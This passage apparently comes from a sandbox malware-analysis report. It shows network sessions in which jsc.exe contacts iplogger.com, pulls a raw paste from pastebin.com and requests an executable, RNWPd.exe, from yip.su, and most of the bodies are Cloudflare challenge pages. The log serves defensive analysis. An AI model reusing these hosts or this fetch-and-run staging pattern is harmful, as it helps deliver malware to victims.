                                    2024-08-17 22:10:12 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 69 70 6c 6f 67 67 65 72 2e 63 6f 6d 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 35 38 31 35 30 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 65 32 62 66 38 30 38 31 61 30 62 27 2c 63 48 61 73 68 3a 20 27 30 32 61 31 62 33 39 32 66 64 33 34 37 31 34 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 31 64 6a 71 55 34 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 6c 42 35 32 2e 6f 34 58 69 52 62 44 46 31 31 39 35 6a 57 59 4c 63 68 61 75 71 59 6f 52 58 64 54 41 68 59 35 6b 54 77 75 6b 66 73 2d 31 37 32 33 39 33 32 36 31 32 2d 30 2e 30 2e 31 2e 31 2d 34 31 35 38 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "iplogger.com",cType: 'managed',cNounce: '58150',cRay: '8b4cfe2bf8081a0b',cHash: '02a1b392fd34714',cUPMDTk: "\/1djqU4?__cf_chl_tk=lB52.o4XiRbDF1195jWYLchauqYoRXdTAhY5kTwukfs-1723932612-0.0.1.1-4158",cFPWv: 'g',cT
                                    2024-08-17 22:10:12 UTC1369INData Raw: 54 4f 6a 71 74 33 69 43 74 36 4e 74 6f 49 46 4c 6f 42 44 6e 61 2e 77 68 63 63 75 77 43 63 65 30 59 56 57 45 54 75 31 48 5f 70 47 4e 4c 67 61 41 5a 34 79 54 38 79 56 72 74 34 78 56 62 42 75 6b 6a 47 65 50 6f 70 5a 70 34 78 64 7a 47 50 5a 73 5f 79 73 74 33 42 7a 6c 37 79 46 51 5f 6f 54 43 52 43 71 72 67 73 48 46 4d 69 4f 53 4d 6b 32 4c 4e 50 6e 62 74 79 6b 61 31 71 67 57 38 54 58 72 67 6a 53 47 30 69 61 69 68 47 71 57 50 46 35 78 33 6c 33 5a 38 73 6a 53 79 5f 51 67 42 67 48 6e 55 34 5a 66 4c 73 57 63 64 6a 37 6b 32 73 53 76 68 51 49 6d 6c 44 4c 5f 66 34 73 38 44 71 35 4a 41 79 6c 6b 36 73 78 66 63 4e 78 59 30 30 69 48 68 5a 72 66 52 5f 38 66 6f 65 77 4c 47 36 61 4f 72 78 5a 30 50 2e 36 58 52 68 70 41 77 35 74 49 47 5a 45 39 6f 62 41 4b 45 34 5a 55 6a 72 39
                                    Data Ascii: TOjqt3iCt6NtoIFLoBDna.whccuwCce0YVWETu1H_pGNLgaAZ4yT8yVrt4xVbBukjGePopZp4xdzGPZs_yst3Bzl7yFQ_oTCRCqrgsHFMiOSMk2LNPnbtyka1qgW8TXrgjSG0iaihGqWPF5x3l3Z8sjSy_QgBgHnU4ZfLsWcdj7k2sSvhQImlDL_f4s8Dq5JAylk6sxfcNxY00iHhZrfR_8foewLG6aOrxZ0P.6XRhpAw5tIGZE9obAKE4ZUjr9


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    44192.168.2.549770104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:10:13 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:10:13 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:10:13 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfe30fa1343e9-EWR
                                    2024-08-17 22:10:13 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:10:13 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:10:13 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:10:13 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:10:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    45192.168.2.549771188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:10:13 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:10:13 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:10:13 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:10:13 UTC679INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 73 6e 77 78 35 6b 75 58 42 31 51 69 41 2f 41 67 53 7a 73 42 4a 68 61 32 5a 7a 57 53 4f 43 55 44 42 45 67 46 70 4b 68 4c 49 35 31 41 4d 36 45 59 54 6a 6b 73 79 53 62 37 77 5a 51 57 67 48 52 44 53 43 6b 65 73 61 54 4e 56 63 75 43 5a 4f 2f 56 4e 5a 38 4d 54 34 4f 48 34 43 58 56 44 65 57 43 47 75 4f 67 35 50 57 4f 67 42 59 3d 24 6f 38 39 6a 55 49 71 31 2b 48 4c 4d 69 33 67 51 4a 35 61 47 75 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: snwx5kuXB1QiA/AgSzsBJha2ZzWSOCUDBEgFpKhLI51AM6EYTjksySb7wZQWgHRDSCkesaTNVcuCZO/VNZ8MT4OH4CXVDeWCGuOg5PWOgBY=$o89jUIq1+HLMi3gQJ5aGuw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:10:13 UTC1369INData Raw: 33 64 65 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3de7<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:10:13 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:10:13 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:10:13 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:10:13 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:10:13 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:10:13 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:10:13 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 33 36 32 34 33 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 65 33 35 31 38 34 61 36 61 35 63 27 2c 63 48 61 73 68 3a 20 27 33 34 36 61 61 39 61 61 38 33 63 64 66 61 66 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 6b 56 32 6f 76 46 53 41 4d 6c 30 37 4a 67 67 43 36 4e 42 39 4c 34 45 59 74 35 62 38 36 58 73 74 65 78 34 4e 61 37 38 65 49 67 55 2d 31 37 32 33 39 33 32 36 31 33 2d 30 2e 30 2e 31 2e 31 2d 34 31 31 36 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '36243',cRay: '8b4cfe35184a6a5c',cHash: '346aa9aa83cdfaf',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=kV2ovFSAMl07JggC6NB9L4EYt5b86Xstex4Na78eIgU-1723932613-0.0.1.1-4116",cFPWv: 'g',cTTim
                                    2024-08-17 22:10:13 UTC1369INData Raw: 43 4e 6a 79 4a 53 52 4a 5a 7a 63 69 45 73 42 34 5a 4c 66 50 6b 2e 4f 58 74 55 38 53 68 49 6b 70 48 73 68 6d 2e 77 44 75 4e 41 50 64 36 57 33 4c 79 41 54 33 69 39 44 71 4c 43 36 49 79 33 72 79 5f 47 44 35 52 45 35 36 75 50 70 48 39 4d 66 4d 49 66 62 6c 47 69 63 61 46 4d 70 39 36 73 71 51 6d 4d 74 71 66 43 42 6d 62 4d 45 47 6d 39 45 47 43 42 6f 4e 64 38 5f 78 6f 37 5a 75 32 49 6c 56 59 74 79 6f 61 57 43 4e 79 63 6b 74 42 33 41 38 52 41 6a 4d 5a 4a 47 65 35 39 65 42 4a 5f 6e 5a 71 46 70 41 31 42 4d 75 58 6e 5a 4d 6b 4d 45 30 36 43 55 52 38 66 67 35 47 6e 2e 44 55 42 6a 7a 72 73 63 7a 32 4b 44 62 61 43 49 7a 61 59 62 64 45 73 61 46 73 63 49 70 34 37 31 59 74 58 6e 30 66 57 50 6c 44 57 6c 42 62 56 53 58 49 59 43 6a 75 68 6f 74 76 6a 6d 6b 45 7a 6c 73 68 6d 7a
                                    Data Ascii: CNjyJSRJZzciEsB4ZLfPk.OXtU8ShIkpHshm.wDuNAPd6W3LyAT3i9DqLC6Iy3ry_GD5RE56uPpH9MfMIfblGicaFMp96sqQmMtqfCBmbMEGm9EGCBoNd8_xo7Zu2IlVYtyoaWCNycktB3A8RAjMZJGe59eBJ_nZqFpA1BMuXnZMkME06CUR8fg5Gn.DUBjzrscz2KDbaCIzaYbdEsaFscIp471YtXn0fWPlDWlBbVSXIYCjuhotvjmkEzlshmz


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    46192.168.2.549772104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:10:19 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:10:19 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:10:19 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfe5559235590-EWR
